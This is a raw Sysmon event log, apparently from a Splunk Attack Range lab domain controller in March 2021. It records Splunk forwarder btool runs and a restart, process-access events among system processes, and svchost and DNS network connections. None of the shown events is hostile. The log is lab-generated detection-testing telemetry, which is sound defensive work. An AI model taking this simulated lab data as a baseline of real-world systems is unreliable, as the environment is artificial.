12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-64EC-6064-CD00-00000000AE01}63805716C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64EC-6064-CE00-00000000AE01}3104C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.914{266CAFBE-64EC-6064-CE00-00000000AE01}3104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EC-6064-CD00-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list httpServer --no-log 10341000x80000000000000008053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64EC-6064-CD00-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64EC-6064-CD00-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-64EC-6064-CC00-00000000AE01}61966560C:\Windows\system32\cmd.exe{266CAFBE-64EC-6064-CD00-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.907{266CAFBE-64EC-6064-CD00-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64EC-6064-CC00-00000000AE01}6196C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list httpServer --no-log 10341000x80000000000000008045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64EC-6064-CC00-00000000AE01}6196C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64EC-6064-CC00-00000000AE01}6196C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.886{266CAFBE-64E9-6064-C000-00000000AE01}67366740C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{266CAFBE-64EC-6064-CC00-00000000AE01}6196C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+17249|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+137ff|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-64EC-6064-CC00-00000000AE01}6196C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2796 10341000x80000000000000008037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.886{266CAFBE-64E9-6064-C000-00000000AE01}67366740C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+457e6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+460cb|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+453d6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d925|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.790{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.790{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.790{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.790{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.790{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.790{266CAFBE-646A-6064-0A00-00000000AE01}840900C:\Windows\system32\services.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.803{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 354300x80000000000000008115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.779{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53596-false104.117.196.27a104-117-196-27.deploy.static.akamaitechnologies.com80http 354300x80000000000000008114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.561{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53595-false104.117.196.27a104-117-196-27.deploy.static.akamaitechnologies.com80http 354300x80000000000000008113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.349{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53594-false20.189.118.208-80http 354300x80000000000000008112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.109{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62564- 354300x80000000000000008111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.105{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53593-false104.117.196.27a104-117-196-27.deploy.static.akamaitechnologies.com80http 354300x80000000000000008110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.100{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54657- 10341000x80000000000000008109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 